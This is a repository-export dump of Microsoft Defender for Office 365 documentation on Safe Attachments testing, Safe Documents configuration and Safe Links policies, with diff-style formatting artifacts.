- ```PowerShell
- Get-SafeAttachmentPolicy -Identity "<Name>" | Format-List
- ```
-
- ```PowerShell
- Get-SafeAttachmentRule -Identity "<Name>" | Format-List
- ```
--- Add the URL `http://spamlink.contoso.com` to a file (for example, a Word document), and attach that file in an email message to test Safe Attachments protection. This URL is similar to the GTUBE text string for testing anti-spam solutions. This URL isn't harmful, but when it's included in an email attachment, it triggers a Safe Attachments protection response.--- To verify that Safe Attachments is scanning messages, check the available Defender for Office 365 reports. For more information, see [View reports for Defender for Office 365](reports-defender-for-office-365.md) and [Use Explorer in the Microsoft Defender portal](threat-explorer-real-time-detections-about.md).
security Safe Documents In E5 Plus Security About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/safe-documents-in-e5-plus-security-about.md
- Title: Safe Documents in Microsoft Defender for Office 365------
- - has-azure-ad-ps-ref
- - azure-ad-ref-level-one-done
- - MET150
-
- - m365-security
- - tier1
-description: Learn about Safe Documents in Microsoft 365 A5 or E5 Security.
- Previously updated : 10/13/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Safe Documents in Microsoft 365 A5 or E5 Security
--
-Safe Documents is a premium feature that uses the cloud back end of [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint) to scan opened Office documents in [Protected View](https://support.microsoft.com/office/d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653) or [Application Guard for Office](https://support.microsoft.com/topic/9e0fb9c2-ffad-43bf-8ba3-78f785fdba46).
-
-Users don't need Defender for Endpoint installed on their local devices to get Safe Documents protection. Users get Safe Documents protection if all of the following requirements are met:
--- Safe Documents is enabled in the organization as described in this article.-- Licenses from a required licensing plan are assigned to the users. Safe Documents is controlled by the **Office 365 SafeDocs** (or **SAFEDOCS** or **bf6f5520-59e3-4f82-974b-7dbbc4fd27c7**) service plan (also known as a service). This service plan is available in the following licensing plans (also known as license plans, Microsoft 365 plans, or products):
- - Microsoft 365 A5 for Faculty
- - Microsoft 365 A5 for Students
- - Microsoft 365 E5 Security
-
- Safe Documents isn't included in Microsoft Defender for Office 365 licensing plans.
-
- For more information, see [Product names and service plan identifiers for licensing](/entra/identity/users/licensing-service-plan-reference).
--- They're using Microsoft 365 Apps for enterprise (formerly known as Office 365 ProPlus) version 2004 or later.-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Configure Safe Documents settings_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to Safe Documents settings_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
-
-### How does Microsoft handle your data?
-
-To keep you protected, Safe Documents sends file information to the [Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection) cloud for analysis. Details on how Microsoft Defender for Endpoint handles your data can be found here: [Microsoft Defender for Endpoint data storage and privacy](/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy).
-
-File information sent by Safe Documents isn't retained in Defender for Endpoint beyond the time needed for analysis (typically, less than 24 hours).
-
-## Use the Microsoft Defender portal to configure Safe Documents
-
-1. In the Microsoft Defender portal, go to the **Safe Attachments** page at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Safe Attachments** in the **Policies** section. Or, to go directly to the **Safe Attachments** page, use <https://security.microsoft.com/safeattachmentv2>.
-
-2. On the **Safe Attachments** page, select :::image type="icon" source="../../media/m365-cc-sc-gear-icon.png" border="false"::: **Global settings**.
-
-3. In the **Global settings** flyout that opens, confirm or configure the following settings:
- - **Turn on Safe Documents for Office clients**: Move the toggle to the right to turn on the feature: :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - **Allow people to click through Protected View even if Safe Documents identified the file as malicious**: We recommend that you leave this option turned off :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
- When you're finished in the **Global settings** flyout, select **Save**.
-
- :::image type="content" source="../../media/safe-docs-global-settings.png" alt-text="The Safe Documents settings after selecting Global settings on the Safe Attachments page" lightbox="../../media/safe-docs-global-settings.png":::
-
-### Use Exchange Online PowerShell to configure Safe Documents
-
-If you'd rather user PowerShell to configure Safe Documents, use the following syntax in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
-
-```powershell
-Set-AtpPolicyForO365 -EnableSafeDocs <$true | $false> -AllowSafeDocsOpen <$true | $false>
-```
--- The _EnableSafeDocs_ parameter enables or disables Safe Documents for the entire organization.-- The _AllowSafeDocsOpen_ parameter allows or prevents users from leaving Protected View (that is, opening the document) if the document has been identified as malicious.-
-This example enables Safe Documents for the entire organization, and prevents users from opening documents that have been identified as malicious from Protected View.
-
-```powershell
-Set-AtpPolicyForO365 -EnableSafeDocs $true -AllowSafeDocsOpen $false
-```
-
-For detailed syntax and parameter information, see [Set-AtpPolicyForO365](/powershell/module/exchange/set-atppolicyforo365).
-
-### Configure individual access to Safe Documents
-
-If you want to selectively allow or block access to the Safe Documents feature, follow these steps:
-
-1. Turn on Safe Documents in the Microsoft Defender portal or Exchange Online PowerShell as previously described in this article.
-2. Use Microsoft Graph PowerShell to disable Safe Documents for specific users as described in [Disable specific Microsoft 365 services for specific users for a specific licensing plan](/microsoft-365/enterprise/disable-access-to-services-with-microsoft-365-powershell#disable-specific-microsoft-365-services-for-specific-users-for-a-specific-licensing-plan).
-
- The name of the service plan to disable in PowerShell is **SAFEDOCS**.
-
-For more information, see the following articles:
--- [View Microsoft 365 licenses and services with PowerShell](/microsoft-365/enterprise/view-licenses-and-services-with-microsoft-365-powershell)-- [View Microsoft 365 account license and service details with PowerShell](/microsoft-365/enterprise/view-account-license-and-service-details-with-microsoft-365-powershell)-- [Product names and service plan identifiers for licensing](/entra/identity/users/licensing-service-plan-reference)-
-### Onboard to the Microsoft Defender for Endpoint service to enable auditing capabilities
-
-To enable auditing capabilities, the local device needs to have Microsoft Defender for Endpoint installed. To deploy Microsoft Defender for Endpoint, you need to go through the various phases of deployment. After onboarding, you can configure auditing capabilities in the Microsoft Defender portal.
-
-To learn more, see [Onboard to the Microsoft Defender for Endpoint service](/microsoft-365/security/defender-endpoint/onboarding). If you need help, see [Troubleshoot Microsoft Defender for Endpoint onboarding issues](/microsoft-365/security/defender-endpoint/troubleshoot-onboarding).
-
-### How do I know this procedure worked?
-
-To verify that you've enabled and configured Safe Documents, do any of the following steps:
--- In the Microsoft Defender portal, go to the **Safe Attachments** page at <https://security.microsoft.com/safeattachmentv2>, select :::image type="icon" source="../../media/m365-cc-sc-gear-icon.png" border="false"::: **Global settings**, and verify the **Turn on Safe Documents for Office clients** and **Allow people to click through Protected View even if Safe Documents identifies the file as malicious** settings.--- Run the following command in Exchange Online PowerShell and verify the property values:-
- ```powershell
- Get-AtpPolicyForO365 | Format-List *SafeDocs*
- ```
--- The following files are available to test Safe Documents protection. These files are similar to the EICAR.TXT file for testing anti-malware and anti-virus solutions. The files aren't harmful, but they trigger Safe Documents protection.-
- - [SafeDocsDemo.docx](https://download.microsoft.com/download/1/9/7/19774467-5ff1-4c4d-9224-27b3751fa58f/SafeDocsDemo.docx)
- - [SafeDocsDemo.pptx](https://download.microsoft.com/download/b/e/f/bef1df26-2c91-45b3-b8d0-348c6fead4af/SafeDocsDemo.pptx)
- - [SafeDocsDemo.xlsx](https://download.microsoft.com/download/d/1/5/d1547fa8-575b-4ae0-969c-0d5265f6d985/SafeDocsDemo.xlsx)
security Safe Links About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/safe-links-about.md
- Title: Complete Safe Links overview for Microsoft Defender for Office 365
- - NOCSH
----
- - '197503'
Previously updated : 4/8/2024-
- - Strat_O365_IP
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
- - MET150
- - MOE150
- - ZVO160
- - ZXL160
- - ZPP160
- - ZWD160
-description: Learn about Safe Links protection in Defender for Office 365 to protect an organization from phishing and other attacks that use malicious URLs. Discover Teams Safe Links, and see graphics of Safe Links messages.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Safe Links in Microsoft Defender for Office 365
--
-> [!IMPORTANT]
-> This article is intended for business customers who have [Microsoft Defender for Office 365](mdo-about.md). If you're using Outlook.com, Microsoft 365 Family, or Microsoft 365 Personal, and you're looking for information about Safelinks in Outlook.com, see [Advanced Outlook.com security for Microsoft 365 subscribers](https://support.microsoft.com/office/882d2243-eab9-4545-a58a-b36fee4a46e2).
-
-In organizations with Microsoft Defender for Office 365, Safe Links scanning protects your organization from malicious links that are used in phishing and other attacks. Specifically, Safe Links provides URL scanning and rewriting of inbound email messages during mail flow, and time-of-click verification of URLs and links in email messages, Teams, and supported Office 365 apps. Safe Links scanning occurs in addition to regular [anti-spam](anti-spam-protection-about.md) and [anti-malware](anti-malware-protection-about.md) protection.
-
-Watch this short video on how to protect against malicious links with Safe Links in Microsoft Defender for Office 365.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWGzjb]
-
-> [!NOTE]
-> Although there's no default Safe Links policy, the **Built-in protection** preset security policy provides Safe Links protection in e-mail messages, Microsoft Teams, and files in supported Office apps to all recipients for customers that have at least one Defender for Office 365 license (users who aren't defined in the Standard or Strict preset security policies or in custom Safe Links policies). For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md). You can also create Safe Links policies that apply to specific users, group, or domains. For instructions, see [Set up Safe Links policies in Microsoft Defender for Office 365](safe-links-policies-configure.md).
-
-Safe Links protection by Safe Links policies is available in the following locations:
--- **Email messages**: Safe Links protection for links in email messages.-
- For more information about Safe Links protection for email messages, see the [Safe Links settings for email messages](#safe-links-settings-for-email-messages) section later in this article.
-
- > [!NOTE]
- > Safe Links doesn't work on mail-enabled public folders.
- >
- > Safe Links doesn't provide protection for URLs in Rich Text Format (RTF) email messages.
- >
- > Safe Links supports only HTTP(S) and FTP formats.
- >
- > Using another service to wrap links before Defender for Office 365 might prevent Safe Links from process links, including wrapping, detonating, or otherwise validating the "maliciousness" of the link.
--- **Microsoft Teams**: Safe Links protection for links in Teams conversations, group chats, or from channels.-
- For more information about Safe Links protection in Teams, see the [Safe Links settings for Microsoft Teams](#safe-links-settings-for-microsoft-teams) section later in this article.
--- **Office apps**: Safe Links protection for supported Office desktop, mobile, and web apps.-
- For more information about Safe Links protection in Office apps, see the [Safe Links settings for Office apps](#safe-links-settings-for-office-apps) section later in this article.
-
-The following table describes scenarios for Safe Links in Microsoft 365 and Office 365 organizations that include Defender for Office 365 (note that lack of licensing is never an issue in the examples).
-
-|Scenario|Result|
-|||
-|Jean is a member of the marketing department. Safe Links protection for Office apps is turned on in a Safe Links policy that applies to members of the marketing department. Jean opens a PowerPoint presentation in an email message, and then clicks a URL in the presentation.|Jean is protected by Safe Links. <br><br> Jean is included in a Safe Links policy where Safe Links protection for Office apps is turned on. <br><br> For more information about the requirements for Safe Links protection in Office apps, see the [Safe Links settings for Office apps](#safe-links-settings-for-office-apps) section later in this article.|
-|Chris's Microsoft 365 E5 organization has no Safe Links policies configured. Chris receives an email from an external sender that contains a URL to a malicious website that he ultimately clicks.|Chris is protected by Safe Links. <br><br> The **Built-in protection** preset security policy provides Safe Links protection to all recipients (users who aren't defined in the Standard or Strict preset security policies or in custom Safe Links policies). For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).|
-|In Pat's organization, admins have created a Safe Links policy that applies Pat, but Safe Links protection for Office apps is turned off. Pat opens a Word document and clicks a URL in the file.|Pat isn't protected by Safe Links. <br><br> Although Pat is included in an active Safe Links policy, Safe Links protection for Office apps is turned off in that policy, so the protection can't be applied.|
-|Jamie and Julia both work for contoso.com. A long time ago, admins configured Safe Links policies that apply to both of Jamie and Julia. Jamie sends an email to Julia, not knowing that the email contains a malicious URL.|Julia is protected by Safe Links **if** the Safe Links policy that applies to her is configured to apply to messages between internal recipients. For more information, see the [Safe Links settings for email messages](#safe-links-settings-for-email-messages) section later in this article.|
-
-## Recipient filters in Safe Links policies
-
-Recipient filters use conditions and exceptions to identify the internal recipients that the policy applies to. At least one condition is required. You can use the following recipient filters for conditions and exceptions:
--- **Users**: One or more mailboxes, mail users, or mail contacts in the organization.-- **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
-- **Domains**: One or more of the configured [accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in Microsoft 365. The recipient's primary email address is in the specified domain.-
-You can use a condition or exception only once, but the condition or exception can contain multiple values:
--- Multiple **values** of the **same condition or exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_):
- - **Conditions**: If the recipient matches **any** of the specified values, the policy is applied to them.
- - **Exceptions**: If the recipient matches **any** of the specified values, the policy isn't applied to them.
--- Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.--- Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
-## Safe Links settings for email messages
-
-Safe Links scans incoming email for known malicious hyperlinks. Scanned URLs are rewritten or _wrapped_ using the Microsoft standard URL prefix: `https://nam01.safelinks.protection..com`. After the link is rewritten, it's analyzed for potentially malicious content.
-
-After Safe Links rewrites a URL, the URL is rewritten even if the message is _manually_ forwarded or replied to. Wrapping is done per message recipient (both internal and external recipients). Additional links that are added to the forwarded or replied-to message are also rewritten.
-
-For _automatic_ forwarding by Inbox rules or SMTP forwarding, the URL isn't rewritten in the message that's intended for the final recipient _unless_ one of the following statements is true:
--- The recipient is also protected by Safe Links.-- The URL was already rewritten in a previous communication.-
-As long as Safe Links protection is turned on, URLs are scanned prior to message delivery, regardless of whether the URLs are rewritten or not. In supported versions of Outlook (Windows, Mac, and Outlook on the web), unwrapped URLs are checked by a client-side API call to Safe Links at the time of click.
-
-The settings in Safe Links policies that apply to email messages are described in the following list:
--- **On: Safe Links checks a list of known, malicious links when users click links in email. URLs are rewritten by default.**: Turn on or turn off Safe Links scanning in email messages. The recommended value is selected (on), and results in the following actions:
- - Safe Links scanning is turned on in Outlook (C2R) on Windows.
- - URLs are rewritten and users are routed through Safe Links protection when they click URLs in messages.
- - When clicked, URLs are checked against a list of known malicious URLs.
- - URLs that don't have a valid reputation are detonated asynchronously in the background.
-
- The following settings are available only if Safe Links scanning in email messages is turned on:
-
- - **Apply Safe Links to email messages sent within the organization**: Turn on or turn off Safe Links scanning on messages sent between internal senders and internal recipients within the same Exchange Online organization. The recommended value is selected (on).
-
- - **Apply real-time URL scanning for suspicious links and links that point to files**: Turns on real-time scanning of links, including links in email messages that point to downloadable content. The recommended value is selected (on).
-
- - **Wait for URL scanning to complete before delivering the message**:
- - Selected (on): Messages that contain URLs are held until scanning is finished. Messages are delivered only after the URLs are confirmed to be safe. This is the recommended value.
- - Not selected (off): If URL scanning can't complete, deliver the message anyway.
-
- - **Do not rewrite URLs, do checks via SafeLinks API only**: If this setting is selected (on), no URL wrapping takes place but the URLs are scanned prior to message delivery. In supported versions of Outlook (Windows, Mac, and Outlook on the web), Safe Links is called exclusively via APIs at the time of URL click.
-
- For more information about the recommended values for Standard and Strict policy settings for Safe Links policies, see [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings).
-
-### How Safe Links works in email messages
-
-At a high level, here's how Safe Links protection works on URLs in email messages:
-
-1. All email goes through EOP, where internet protocol (IP) and envelope filters, signature-based malware protection, anti-spam and anti-malware filters before the message is delivered to the recipient's mailbox.
-
-2. The user opens the message in their mailbox and clicks on a URL in the message.
-
-3. Safe Links immediately checks the URL before opening the website:
-
- - If the URL points to a website that has been determined to be malicious, a [malicious website warning](#malicious-website-warning) page (or a different warning page) opens.
-
- - If the URL points to a downloadable file, and the **Apply real-time URL scanning for suspicious links and links that point to files** setting is turned on in the policy that applies to the user, the downloadable file is checked.
-
- - If the URL is determined to be safe, the website opens.
-
-## Safe Links settings for Microsoft Teams
-
-You turn on or turn off Safe Links protection for Microsoft Teams in Safe Links policies. Specifically, you use the **On: Safe Links checks a list of known, malicious links when users click links in Microsoft Teams. URLs are not rewritten** setting in the **Teams** section. The recommended value is on (selected).
-
-> [!NOTE]
-> When you turn on or turn off Safe Links protection for Teams, it might take up to 24 hours for the change to take effect.
->
-> Safe Links protection for Teams is supported in Teams desktop and web instances.
-
-URLs in Teams are checked against a list of known malicious links when the protected user clicks the link (time-of-click protection). URLs aren't rewritten. If a link is found to be malicious, users have the following experiences:
--- If the link was clicked in a Teams conversation, group chat, or from channels, the warning page as shown in the screenshot appears in the default web browser.-- If the link was clicked from a pinned tab, the warning page appears in the Teams interface within that tab. The option to open the link in a web browser is disabled for security reasons.-- Depending on how the **Let users click through to the original URL** setting in the policy is configured, the user is or isn't allowed to click through to the original URL (**Continue anyway (not recommended)** in the screenshot). We recommend that you don't select the **Let users click through to the original URL** setting so users can't click through to the original URL.-
-If the user who sent the link isn't protected by a Safe Links policy where Teams protection is turned on, the user is free to click through to the original URL on their computer or device.
--
-Clicking the **Go Back** button on the warning page returns the user to their original context or URL location. However, clicking on the original link again causes Safe Links to rescan the URL, so the warning page reappears.
-
-### How Safe Links works in Teams
-
-At a high level, here's how Safe Links protection works for URLs in Microsoft Teams:
-
-1. A user starts the Teams app.
-
-2. Microsoft 365 verifies that the user's organization includes Microsoft Defender for Office 365, and that the user is included in an active Safe Links policy where protection for Microsoft Teams is turned on.
-
-3. URLs are validated at the time of click for the user in chats, group chats, channels, and tabs.
-
-## Safe Links settings for Office apps
-
-Safe Links protection for Office apps checks links in Office documents, not links in email messages. But, it can check links in attached Office documents in email messages after the document is opened.
-
-You turn on or turn off Safe Links protection for Office apps in Safe Links policies. Specifically, you use the **On: Safe Links checks a list of known, malicious links when users click links in Microsoft Office apps. URLs are not rewritten** setting in the **Office 365 apps** section. The recommended value is on (selected).
-
-Safe Links protection for Office apps has the following client requirements:
--- Microsoft 365 Apps or Microsoft 365 Business Premium:
- - Current versions of Word, Excel, and PowerPoint on Windows, Mac, or in a web browser.
- - Office apps on iOS or Android devices.
- - Visio on Windows.
- - OneNote in a web browser.
- - Outlook for Windows when opening saved EML or MSG files.
--- Supported Office apps and Microsoft 365 services are configured to use modern authentication. For more information, see [How modern authentication works for Office client apps](/microsoft-365/enterprise/modern-auth-for-office-2013-and-2016).--- Users are signed in using their work or school accounts. For more information, see [Sign in to Office](https://support.microsoft.com/office/b9582171-fd1f-4284-9846-bdd72bb28426).-
-For more information about the recommended values for Standard and Strict policy settings, see [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings).
-
-### How Safe Links works in Office apps
-
-At a high level, here's how Safe Links protection works for URLs in Office apps. The supported Office apps are described in the previous section.
-
-1. A user signs in using their work or school account in an organization that includes Microsoft 365 Apps or Microsoft 365 Business Premium.
-
-2. The user opens and clicks on a link an Office document in a supported Office app.
-
-3. Safe Links immediately checks the URL before opening the target website:
-
- - If the URL points to a website that has been determined to be malicious, a [malicious website warning](#malicious-website-warning) page (or a different warning page) opens.
-
- - If the URL points to a downloadable file, and the Safe Links policy that applies to the user is configured to scan links to downloadable content (**Apply real-time URL scanning for suspicious links and links that point to files**), the downloadable file is checked.
-
- - If the URL is considered safe, the user is taken to the website.
-
- - If Safe Links scanning is unable to complete, Safe Links protection doesn't trigger. In Office desktop clients, the user is warned before they proceed to the destination website.
-
-> [!NOTE]
-> It may take several seconds at the beginning of each session to verify that Safe Links for Office apps is available to the user.
-
-## Click protection settings in Safe Links policies
-
-These settings apply to Safe Links in email, Teams, and Office apps:
--- **Track user clicks**: Turn on or turn off storing Safe Links click data for URLs clicked. We recommend that you leave this setting selected (on).-
- In Safe Links for Office apps, this setting applies to the desktop versions Word, Excel, PowerPoint, and Visio.
-
- If you select this setting, the following settings are available:
-
- - **Let users click through to the original URL**: Controls whether users can click through the [warning page](#warning-pages-from-safe-links) to the original URL. The recommend value is not selected (off).
-
- In Safe Links for Office apps, this setting applies to the original URL in the desktop versions Word, Excel, PowerPoint, and Visio.
-
- - **Display the organization branding on notification and warning pages**: This option shows your organization's branding on warning pages. Branding helps users identify legitimate warnings, because default Microsoft warning pages are often used by attackers. For more information about customized branding, see [Customize the Microsoft 365 theme for your organization](/microsoft-365/admin/setup/customize-your-organization-theme).
-
-## Priority of Safe Links policies
-
-After you create multiple policies, you can specify the order that they're applied. No two policies can have the same priority, and policy processing stops after the first policy is applied (the highest priority policy for that recipient). The **Built-in protection** policy is always applied last. The Safe Links policies associated **Standard** and **Strict** preset security policies are always applied before custom Safe Links policies.
-
-For more information about the order of precedence and how multiple policies are evaluated and applied, see [Order of precedence for preset security policies and other policies](preset-security-policies.md#order-of-precedence-for-preset-security-policies-and-other-policies) and [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-## "Do not rewrite the following URLs" lists in Safe Links policies
-
-> [!NOTE]
-> Entries in the "Do not rewrite the following URLs" list aren't scanned or wrapped by Safe Links during mail flow, but might still be blocked at time of click. Report the URL as **Should not have been blocked (False positive)** and select **Alow this URL** to add an allow entry to the Tenant Allow/Block List so the URL isn't scanned or wrapped by Safe Links during mail flow _and_ at time of click. For instructions, see [Report good URLs to Microsoft](submissions-admin.md#report-good-urls-to-microsoft).
-
-Each Safe Links policy contains a **Do not rewrite the following URLs** list that you can use to specify URLs that aren't rewritten by Safe Links scanning. You can configure different lists in different Safe Links policies. Policy processing stops after the first (likely, the highest priority) policy is applied to the user. So, only one **Do not rewrite the following URLs** list is applied to a user who is included in multiple active Safe Links policies.
-
-To add entries to the list in new or existing Safe Links policies, see [Create Safe Links policies](safe-links-policies-configure.md#use-the-microsoft-defender-portal-to-create-safe-links-policies) or [Modify Safe Links policies](safe-links-policies-configure.md#use-the-microsoft-defender-portal-to-modify-custom-safe-links-policies).
-
-**Notes**:
--- The following clients don't recognize the **Do not rewrite the following URLs** lists in Safe Links policies. Users included in the policies can be blocked from accessing the URLs based on the results of Safe Links scanning in these clients:
- - Microsoft Teams
- - Office web apps
-
- For a truly universal list of URLs that are allowed everywhere, see [Manage the Tenant Allow/Block List](tenant-allow-block-list-about.md). However, URL allow entries in the Tenant Allow/Block List aren't excluded from Safe Links rewriting.
--- Consider adding commonly used internal URLs to the list to improve the user experience. For example, if you have on-premises services, such as Skype for Business or SharePoint, you can add those URLs to exclude them from scanning.-- If you already have **Do not rewrite the following URLs** entries in your Safe Links policies, be sure to review the lists and add wildcards as required. For example, your list has an entry like `https://contoso.com/a` and you later decide to include subpaths like `https://contoso.com/a/b`. Instead of adding a new entry, add a wildcard to the existing entry so it becomes `https://contoso.com/a/*`.-- You can include up to three wildcards (`*`) per URL entry. Wildcards explicitly include prefixes or subdomains. For example, the entry `contoso.com` isn't the same as `*.contoso.com/*`, because `*.contoso.com/*` allows people to visit subdomains and paths in the specified domain.-- If a URL uses automatic redirection for HTTP to HTTPS (for example, 302 redirection for `http://www.contoso.com` to `https://www.contoso.com`), and you try to enter both HTTP and HTTPS entries for the same URL to the list, you might notice that the second URL entry replaces the first URL entry. This behavior doesn't occur if the HTTP and HTTPS versions of the URL are completely separate.-- Don't specify http:// or https:// (that is, contoso.com) in order to exclude both HTTP and HTTPS versions.-- `*.contoso.com` does **not** cover contoso.com, so you would need to exclude both to cover both the specified domain and any child domains.-- `contoso.com/*` covers **only** contoso.com, so there's no need to exclude both `contoso.com` and `contoso.com/*`; just `contoso.com/*` would suffice.-- To exclude all iterations of a domain, two exclusion entries are needed; `contoso.com/*` and `*.contoso.com/*`. These entries combine to exclude both HTTP and HTTPS, the main domain contoso.com and any child domains, as well as any or not ending part (for example, both contoso.com and contoso.com/vdir1 are covered).-
-### Entry syntax for the "Do not rewrite the following URLs" list
-
-Examples of the values that you can enter and their results are described in the following table:
-
-|Value|Result|
-|||
-|`contoso.com`|Allows access to `https://contoso.com` but not subdomains or paths.|
-|`*.contoso.com/*`|Allows access to a domain, subdomains, and paths (for example, `https://www.contoso.com`, `https://www.contoso.com`, `https://maps.contoso.com`, or `https://www.contoso.com/a`). <br><br> This entry is inherently better than `*contoso.com*`, because it doesn't allow potentially fraudulent sites, like `https://www.falsecontoso.com` or `https://www.false.contoso.completelyfalse.com`|
-|`https://contoso.com/a`|Allows access to `https://contoso.com/a`, but not subpaths like `https://contoso.com/a/b`|
-|`https://contoso.com/a/*`|Allows access to `https://contoso.com/a` and subpaths like `https://contoso.com/a/b`|
-
-## Warning pages from Safe Links
-
-This section contains examples of the various warning pages that are triggered by Safe Links protection when you click a URL.
-
-### Scan in progress notification
-
-The clicked URL is being scanned by Safe Links. You might need to wait a few moments before trying the link again.
--
-### Suspicious message warning
-
-The clicked URL was in an email message that's similar to other suspicious messages. We recommend that you double-check the email message before proceeding to the site.
-
-### Phishing attempt warning
-
-The clicked URL was in an email message that has been identified as a phishing attack. As a result, all URLs in the email message are blocked. We recommend that you don't proceed to the site.
-
-### Malicious website warning
-
-The clicked URL points to a site that has been identified as malicious. We recommend that you don't proceed to the site.
--
-### Error warning
-
-Some kind of error has occurred, and the URL can't be opened.
-
security Safe Links Policies Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/safe-links-policies-configure.md
- Title: Set up Safe Links policies in Microsoft Defender for Office 365
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier1
-
-description: Admins can learn how to view, create, modify, and delete Safe Links policies in Microsoft Defender for Office 365.
- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Set up Safe Links policies in Microsoft Defender for Office 365
--
-> [!IMPORTANT]
-> This article is intended for business customers who have [Microsoft Defender for Office 365](mdo-about.md). If you are a home user looking for information about Safelinks in Outlook, see [Advanced Outlook.com security](https://support.microsoft.com/office/882d2243-eab9-4545-a58a-b36fee4a46e2).
-
-In organizations with Microsoft Defender for Office 365, Safe Links provides URL scanning of links in messages, Microsoft Teams, and supported Office 365 apps. For more information, see [Safe Links in Microsoft Defender for Office 365](safe-links-about.md).
-
-Although there's no default Safe Links policy, the **Built-in protection** preset security policy provides Safe Links protection to all recipients by default. Recipients who are specified in the Standard or Strict preset security policies or in custom Safe Links policies aren't affected. For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-For greater granularity, you can also use the procedures in this article to create Safe Links policies that apply to specific users, group, or domains.
-
-You configure Safe Links policies in the Microsoft Defender portal or in Exchange Online PowerShell.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Safe Links** page, use <https://security.microsoft.com/safelinksv2>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md) and [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Create, modify, and delete policies_: Membership in the **Organization Management** or **Security Administrator** role groups in Email & collaboration RBAC <u>and</u> membership in the **Organization Management** role group in Exchange Online RBAC.
- - _Read-only access to policies_: Membership in one of the following role groups:
- - **Global Reader** or **Security Reader** in Email & collaboration RBAC.
- - **View-Only Organization Management** in Exchange Online RBAC.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for Safe Links policies, see [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings).-
- > [!TIP]
